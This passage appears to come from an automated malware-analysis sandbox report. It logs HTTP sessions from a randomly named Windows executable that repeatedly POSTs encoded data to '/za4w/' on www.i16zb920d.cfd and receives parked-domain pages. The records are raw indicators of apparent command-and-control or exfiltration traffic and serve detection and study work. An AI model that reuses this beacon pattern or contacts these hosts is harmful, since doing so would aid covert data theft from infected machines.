                          Data Ascii: "> <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" t
                          Sep 23, 2024 14:54:50.714581013 CEST1236INData Raw: 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: haspopup="true" aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                          Sep 23, 2024 14:54:50.714684010 CEST1236INData Raw: 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: -item dropdown-toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                          Sep 23, 2024 14:54:50.714750051 CEST448INData Raw: 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: -item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                          Sep 23, 2024 14:54:50.714785099 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                          Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                          Sep 23, 2024 14:54:50.714812994 CEST224INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                          Sep 23, 2024 14:54:50.719856977 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dr


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.449747199.59.243.227802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:55.913738966 CEST723OUTPOST /za4w/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.i16zb920d.cfd
                          Origin: http://www.i16zb920d.cfd
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.i16zb920d.cfd/za4w/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 58 6b 69 78 56 56 61 4b 77 57 57 5a 51 57 4b 35 6b 59 58 50 49 6f 4f 70 4b 39 63 79 56 5a 37 6d 34 78 78 55 7a 4e 79 72 4c 33 57 65 46 71 63 57 38 33 76 70 36 42 36 51 4c 32 63 73 70 69 48 4f 4f 31 59 35 73 47 59 45 70 48 56 73 77 71 30 42 36 53 6b 4e 59 79 53 78 59 56 53 67 6a 2b 39 58 78 68 6a 6e 36 63 5a 52 4c 4d 5a 76 4f 63 47 53 62 6a 36 42 72 53 61 66 51 33 65 4c 4b 72 50 56 66 63 64 4b 48 62 78 38 69 69 48 62 48 76 54 32 46 4e 4b 6a 31 62 4a 31 6f 75 4d 36 73 2b 70 65 45 34 75 4b 63 78 37 4b 6e 69 5a 59 44 59 72 70 70 67 37 56 42 4a 41 4f 4c 77 2b 74 73 43 6d 35 51 67 3d 3d
                          Data Ascii: 3jE8o=XkixVVaKwWWZQWK5kYXPIoOpK9cyVZ7m4xxUzNyrL3WeFqcW83vp6B6QL2cspiHOO1Y5sGYEpHVswq0B6SkNYySxYVSgj+9Xxhjn6cZRLMZvOcGSbj6BrSafQ3eLKrPVfcdKHbx8iiHbHvT2FNKj1bJ1ouM6s+peE4uKcx7KniZYDYrppg7VBJAOLw+tsCm5Qg==
                          Sep 23, 2024 14:54:56.376271963 CEST1236INHTTP/1.1 200 OK
                          date: Mon, 23 Sep 2024 12:54:55 GMT
                          content-type: text/html; charset=utf-8
                          content-length: 1118
                          x-request-id: cc76c72b-bd23-4905-aa81-09f3a9a4b613
                          cache-control: no-store, max-age=0
                          accept-ch: sec-ch-prefers-color-scheme
                          critical-ch: sec-ch-prefers-color-scheme
                          vary: sec-ch-prefers-color-scheme
                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==
                          set-cookie: parking_session=cc76c72b-bd23-4905-aa81-09f3a9a4b613; expires=Mon, 23 Sep 2024 13:09:56 GMT; path=/
                          connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 4e 71 51 55 59 43 4c 5a 66 4b 4c 77 6d 63 75 66 78 33 37 41 49 2b 44 39 54 2b 54 4b 34 76 35 35 71 73 4e 6e 59 67 61 76 6b 72 42 50 59 66 35 77 4c 31 50 79 63 37 69 37 41 38 44 6a 64 70 54 7a 33 41 50 46 79 46 63 6b 51 6c 72 6d 48 59 7a 49 4d 34 2f 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                          Sep 23, 2024 14:54:56.376332045 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2M3NmM3MmItYmQyMy00OTA1LWFhODEtMDlmM2E5YTRiNjEzIiwicGFnZV90aW1lIjoxNzI3MDk2MD


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449748199.59.243.227802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:58.463135004 CEST743OUTPOST /za4w/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.i16zb920d.cfd
                          Origin: http://www.i16zb920d.cfd
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.i16zb920d.cfd/za4w/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 58 6b 69 78 56 56 61 4b 77 57 57 5a 51 33 36 35 33 72 76 50 4f 49 4f 6f 50 39 63 79 63 35 36 76 34 78 39 55 7a 50 65 37 4c 43 47 65 45 4c 73 57 2f 79 62 70 37 42 36 51 66 6d 63 70 30 79 47 4d 4f 31 63 4c 73 47 6b 45 70 48 42 73 77 6f 63 42 36 68 38 4d 61 69 53 2f 4e 46 53 69 2b 75 39 58 78 68 6a 6e 36 64 39 37 4c 4d 52 76 50 73 57 53 4b 32 4f 4f 6c 79 61 63 41 6e 65 4c 64 62 50 52 66 63 64 73 48 61 73 58 69 6e 4c 62 48 76 44 32 43 66 69 69 67 4c 4a 33 6e 4f 4e 2f 67 4d 63 6f 50 71 48 5a 57 42 7a 66 35 41 4a 4b 43 65 36 7a 34 52 61 43 54 4a 6b 39 57 33 33 5a 68 42 62 77 4c 6e 72 5a 62 6e 61 65 52 43 56 49 78 4a 66 33 48 32 77 48 42 50 38 3d
                          Data Ascii: 3jE8o=XkixVVaKwWWZQ3653rvPOIOoP9cyc56v4x9UzPe7LCGeELsW/ybp7B6Qfmcp0yGMO1cLsGkEpHBswocB6h8MaiS/NFSi+u9Xxhjn6d97LMRvPsWSK2OOlyacAneLdbPRfcdsHasXinLbHvD2CfiigLJ3nON/gMcoPqHZWBzf5AJKCe6z4RaCTJk9W33ZhBbwLnrZbnaeRCVIxJf3H2wHBP8=
                          Sep 23, 2024 14:54:58.902292967 CEST1236INHTTP/1.1 200 OK
                          date: Mon, 23 Sep 2024 12:54:58 GMT
                          content-type: text/html; charset=utf-8
                          content-length: 1118
                          x-request-id: dfc5e160-ffa6-4f46-af65-cb54ae9b41e6
                          cache-control: no-store, max-age=0
                          accept-ch: sec-ch-prefers-color-scheme
                          critical-ch: sec-ch-prefers-color-scheme
                          vary: sec-ch-prefers-color-scheme
                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==
                          set-cookie: parking_session=dfc5e160-ffa6-4f46-af65-cb54ae9b41e6; expires=Mon, 23 Sep 2024 13:09:58 GMT; path=/
                          connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 4e 71 51 55 59 43 4c 5a 66 4b 4c 77 6d 63 75 66 78 33 37 41 49 2b 44 39 54 2b 54 4b 34 76 35 35 71 73 4e 6e 59 67 61 76 6b 72 42 50 59 66 35 77 4c 31 50 79 63 37 69 37 41 38 44 6a 64 70 54 7a 33 41 50 46 79 46 63 6b 51 6c 72 6d 48 59 7a 49 4d 34 2f 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                          Sep 23, 2024 14:54:58.902343988 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGZjNWUxNjAtZmZhNi00ZjQ2LWFmNjUtY2I1NGFlOWI0MWU2IiwicGFnZV90aW1lIjoxNzI3MDk2MD


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.449749199.59.243.227802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:01.008769035 CEST10825OUTPOST /za4w/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.i16zb920d.cfd
                          Origin: http://www.i16zb920d.cfd
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.i16zb920d.cfd/za4w/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 58 6b 69 78 56 56 61 4b 77 57 57 5a 51 33 36 35 33 72 76 50 4f 49 4f 6f 50 39 63 79 63 35 36 76 34 78 39 55 7a 50 65 37 4c 42 6d 65 46 35 6b 57 38 52 44 70 38 42 36 51 63 6d 63 6f 30 79 47 4e 4f 7a 30 50 73 47 70 78 70 46 35 73 68 37 6b 42 79 77 38 4d 51 69 53 2f 50 46 53 6a 6a 2b 39 43 78 68 7a 72 36 64 74 37 4c 4d 52 76 50 75 65 53 61 54 36 4f 6e 79 61 66 51 33 65 48 4b 72 50 31 66 63 45 5a 48 61 35 73 69 55 44 62 48 4c 66 32 48 73 4b 69 39 37 4a 78 67 4f 4e 5a 67 4d 41 37 50 71 62 56 57 41 33 31 35 43 56 4b 42 62 62 38 69 67 79 44 49 4a 30 4a 55 6c 6d 34 67 44 33 65 48 6b 33 48 51 48 58 45 4d 6a 6c 6d 30 35 75 66 51 54 6f 43 56 62 35 4a 34 41 2b 4f 2f 37 58 2b 6c 52 6f 77 2f 47 43 56 2f 35 34 36 56 35 45 78 50 32 51 43 66 57 79 36 68 68 4e 65 43 66 76 33 71 50 31 70 4f 53 33 44 32 6c 34 39 70 35 77 77 74 7a 4c 63 64 65 72 31 59 66 78 43 68 41 44 56 45 54 2f 31 78 50 6f 77 64 4b 36 69 39 6e 4c 73 5a 76 6b 7a 62 6f 53 54 43 30 62 63 43 6d 47 34 67 62 62 46 45 53 59 56 4c 4a 57 5a [TRUNCATED]
                          Data Ascii: 3jE8o=XkixVVaKwWWZQ3653rvPOIOoP9cyc56v4x9UzPe7LBmeF5kW8RDp8B6Qcmco0yGNOz0PsGpxpF5sh7kByw8MQiS/PFSjj+9Cxhzr6dt7LMRvPueSaT6OnyafQ3eHKrP1fcEZHa5siUDbHLf2HsKi97JxgONZgMA7PqbVWA315CVKBbb8igyDIJ0JUlm4gD3eHk3HQHXEMjlm05ufQToCVb5J4A+O/7X+lRow/GCV/546V5ExP2QCfWy6hhNeCfv3qP1pOS3D2l49p5wwtzLcder1YfxChADVET/1xPowdK6i9nLsZvkzboSTC0bcCmG4gbbFESYVLJWZXEMKvxww4FStWyJxwDJwwBHfnS2PLQFe4R2MBvPfwsK0CyHq4/ZCN0Rh3Rud1OQXFG/6dtfzdBijMdDcmwIIRs8hKKvCFqVGzptBQoAs9l+mJdfxzcFFs2snPNcTYR2WmTwe4+zjWyQrERrnOOomax6g/MYN1IKBkw6mftjPQ8sCHzEyQU/d5hI5Ni7UGbu3u/hpVQBE1OJHGfIa1Q1l3xrmXuhbg0+cC2qXzIBt+CkeSDuud2rBRZfdrhKXnecRfhKHdUWbjyTtgp6mERfAB7BT2t6JF0/AMN1qZTXTKtzcvP96+7RiJOR/cjy/Xirwj+fBqB9Fkw4K9NOVUD/s0akyBMs9/LGs3vKfjNoKF/Mgm5Hc8IVJS1PyhZRLFecfSKxtFT44+5EJ3zG+HVZatLqU0ZxNEQkC8h8etjNpErt8jHxHUKiOtE1FVEEYW8eT0lx0P79AithSO0gatWTws/cZFeagVWvhxa17ci6bPbcl1ZiRAw6qGnzvD8xR0Bhvx2q15nluURzKeuReC/g5Ixw3yJ1SF6JE+WqEN3w48iV9IFTTWh+oUtY2CGcI2K+NlLDzomyfPNkppE0D2mP2gf0JdcKxFWD7vU3zajbsWFELtotmVLy4XBU5EVYi5OWQufyuyNDMY33E5sWi6QWsAWCQWdQzyTjnaM [TRUNCATED]
                          Sep 23, 2024 14:55:01.457014084 CEST1236INHTTP/1.1 200 OK
                          date: Mon, 23 Sep 2024 12:55:00 GMT
                          content-type: text/html; charset=utf-8
                          content-length: 1118
                          x-request-id: 15ad6a85-7456-4456-8a88-9359b2e4aa09
                          cache-control: no-store, max-age=0
                          accept-ch: sec-ch-prefers-color-scheme
                          critical-ch: sec-ch-prefers-color-scheme
                          vary: sec-ch-prefers-color-scheme
                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==
                          set-cookie: parking_session=15ad6a85-7456-4456-8a88-9359b2e4aa09; expires=Mon, 23 Sep 2024 13:10:01 GMT; path=/
                          connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 4e 71 51 55 59 43 4c 5a 66 4b 4c 77 6d 63 75 66 78 33 37 41 49 2b 44 39 54 2b 54 4b 34 76 35 35 71 73 4e 6e 59 67 61 76 6b 72 42 50 59 66 35 77 4c 31 50 79 63 37 69 37 41 38 44 6a 64 70 54 7a 33 41 50 46 79 46 63 6b 51 6c 72 6d 48 59 7a 49 4d 34 2f 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jNqQUYCLZfKLwmcufx37AI+D9T+TK4v55qsNnYgavkrBPYf5wL1Pyc7i7A8DjdpTz3APFyFckQlrmHYzIM4/1g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                          Sep 23, 2024 14:55:01.457061052 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTVhZDZhODUtNzQ1Ni00NDU2LThhODgtOTM1OWIyZTRhYTA5IiwicGFnZV90aW1lIjoxNzI3MDk2MT


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449750199.59.243.227802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:03.554536104 CEST457OUTGET /za4w/?3jE8o=amKRWiKm4n2uVVmquK3pO4ytbvwAVYfGsSxD6t+zETObSo4UtHmM+luuKDpd7kXCKFMkhSBg5WV5tZxLwwxtS3C6HDmB+/Q82UKvkehAPto6APfZTiOkjF0=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.i16zb920d.cfd
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:55:04.005343914 CEST1236INHTTP/1.1 200 OK
                          date: Mon, 23 Sep 2024 12:55:03 GMT
                          content-type: text/html; charset=utf-8
                          content-length: 1450
                          x-request-id: 101d4545-516d-4205-8326-d817709699d9
                          cache-control: no-store, max-age=0
                          accept-ch: sec-ch-prefers-color-scheme
                          critical-ch: sec-ch-prefers-color-scheme
                          vary: sec-ch-prefers-color-scheme
                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_COF8kGGhpRRSimubL6BWWfGBIa6+qn9h1YXYztyiIx9FAT3q/gY+hphOKxIAgHIp0zRsPger8UkGmjaoQXalgA==
                          set-cookie: parking_session=101d4545-516d-4205-8326-d817709699d9; expires=Mon, 23 Sep 2024 13:10:03 GMT; path=/
                          connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 4f 46 38 6b 47 47 68 70 52 52 53 69 6d 75 62 4c 36 42 57 57 66 47 42 49 61 36 2b 71 6e 39 68 31 59 58 59 7a 74 79 69 49 78 39 46 41 54 33 71 2f 67 59 2b 68 70 68 4f 4b 78 49 41 67 48 49 70 30 7a 52 73 50 67 65 72 38 55 6b 47 6d 6a 61 6f 51 58 61 6c 67 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_COF8kGGhpRRSimubL6BWWfGBIa6+qn9h1YXYztyiIx9FAT3q/gY+hphOKxIAgHIp0zRsPger8UkGmjaoQXalgA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                          Sep 23, 2024 14:55:04.005409956 CEST903INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
